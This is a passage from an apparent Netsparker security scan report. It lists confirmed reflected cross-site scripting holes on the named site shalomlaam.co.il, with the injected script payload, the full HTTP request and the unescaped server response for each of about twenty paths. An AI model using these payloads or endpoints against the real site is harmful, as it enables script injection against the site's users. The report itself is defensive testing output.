User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
68 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/'"--></style></script><script>netsparker(0x0000F2)</script><BR>script><BR>style><<script>netsparker(0x0000F2)<.asp?id=script>
3.102. /search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001DA)</script>
Request
GET /search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DA)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/search/default.asp'"--></style></script><script>netsparker(0x0001DA)</script><BR>script><BR>style><<script>netsparker(0x0001DA)<.asp?id=script>
3.103. /gvideo/testimonialrotator/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000446)</script>
Request
GET /gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000446)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 186
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/'"--></style></script><script>netsparker(0x000446)</script><BR>script><BR>style><<script>netsparker(0x000446)<.asp?id=script>
69 / 146
3.104. /gvideo/js/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000439)</script>
Request
GET /gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000439)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/js/'"--></style></script><script>netsparker(0x000439)</script><BR>script><BR>style><<script>netsparker(0x000439)<.asp?id=script>
3.105. /etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001B2)</script>
Request
GET /etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/etz_haim/'"--></style></script><script>netsparker(0x0001B2)</script><BR>script><BR>style><<script>netsparker(0x0001B2)<.asp?id=script>
70 / 146
3.106. /gvideo/js/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00043D)</script>
Request
GET /gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00043D)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/js/swfobject.js'"--></style></script><script>netsparker(0x00043D)</script><BR>script><BR>style><<script>netsparker(0x00043D)<.asp?id=script>
3.107. /snif.asp CONFIRMED
http://www.shalomlaam.co.il/snif.asp?'"--></style></script><script>alert(0x00023A)</script>
Parameters
Parameter Type Value
id GET 61
Query Based Query String '"--></style></script>
<script>alert(0x00023A)</script>
Request
GET /snif.asp?'"--></style></script><script>netsparker(0x00023A)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:51 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/snif.asp?'"--></style></script><script>netsparker(0x00023A)</script><BR>script><BR>style><<script>netsparker(0x00023A)<.asp?id=script>
71 / 146
3.108. /js/AC_RunActiveContent.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000DF)</script>
Request
GET /js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000DF)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/AC_RunActiveContent.js'"--></style></script><script>netsparker(0x0000DF)</script><BR>script><BR>style><<script>netsparker(0x0000DF)<.asp?id=script>
3.109. /gallery/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
Parameter Type Value
id GET 0
URI-BASED Full URL '"--></style></script>
<script>alert(0x00026D)</script>
Request
GET /gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00026D)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/gallery/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:55:28 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/gallery/Default.asp'"--></style></script><script>netsparker(0x00026D)</script><BR>script><BR>style><<script>netsparker(0x00026D)<.asp?id=script>
72 / 146
3.110. /site/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00027E)</script>
Request
GET /site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00027E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:55:53 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/reg/'"--></style></script><script>netsparker(0x00027E)</script><BR>script><BR>style><<script>netsparker(0x00027E)<.asp?id=script>
3.111. /site/ask/ask_rabbi.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002D2)</script>
Request
GET /site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002D2)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/ask/ask_rabbi.asp'"--></style></script><script>netsparker(0x0002D2)</script><BR>script><BR>style><<script>netsparker(0x0002D2)<.asp?id=script>
73 / 146
3.112. /about/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
URI-BASED Full URL '"--></style></script>
<script>alert(0x000522)</script>
Request
POST /about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000522)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 188
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000522)</script><BR>script><BR>style><<script>netsparker(0x000522)<.asp?id=script>
3.113. /pages/page.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
Parameter Type Value
id GET 96
URI-BASED Full URL '"--></style></script>
<script>alert(0x00021B)</script>
Request
GET /pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021B)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pages/page.asp'"--></style></script><script>netsparker(0x00021B)</script><BR>script><BR>style><<script>netsparker(0x00021B)<.asp?id=script>
74 / 146
3.114. /site/l/agrala_takanon.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000393)</script>
Request
GET /site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000393)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:07 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/l/agrala_takanon.asp'"--></style></script><script>netsparker(0x000393)</script><BR>script><BR>style><<script>netsparker(0x000393)<.asp?id=script>
3.115. /Branches/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00015B)</script>
Request
GET /Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015B)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:55 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/Branches/'"--></style></script><script>netsparker(0x00015B)</script><BR>script><BR>style><<script>netsparker(0x00015B)<.asp?id=script>
75 / 146
3.116. /gvideo/testimonialrotator/testimonialrotator.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000455)</script>
Request
GET /gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000455)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/gvideo/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:01:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 208
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/testimonialrotator/testimonialrotator.css'"--></style></script><script>netsparker(0x000455)</script><BR>script><BR>style>
<<script>netsparker(0x000455)<.asp?id=script>
3.117. /images/pagetop.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003E6)</script>
Request
GET /images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E6)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/images/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:33 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/pagetop.asp'"--></style></script><script>netsparker(0x0003E6)</script><BR>script><BR>style><<script>netsparker(0x0003E6)<.asp?id=script>
76 / 146
3.118. /site/l/agrala_sheelot.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000397)</script>
Request
GET /site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000397)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:10 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/l/agrala_sheelot.asp'"--></style></script><script>netsparker(0x000397)</script><BR>script><BR>style><<script>netsparker(0x000397)<.asp?id=script>
3.119. /ask/reg/maillingUpdate.asp CONFIRMED
http://www.shalomlaam.co.il/ask/reg/maillingUpdate.asp?'"--></style></script><script>alert(0x000643)..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
Query Based Query String '"--></style></script>
<script>alert(0x000643)</script>
Request
POST /ask/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000643)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:07:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 187
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp?'"--></style></script><script>netsparker(0x000643)</script><BR>script><BR>style><<script>netsparker(0x000643)<.asp?id=script>
77 / 146
3.120. /site/l/agrala_miadim.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00038E)</script>
Request
GET /site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00038E)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/sitemap.xml
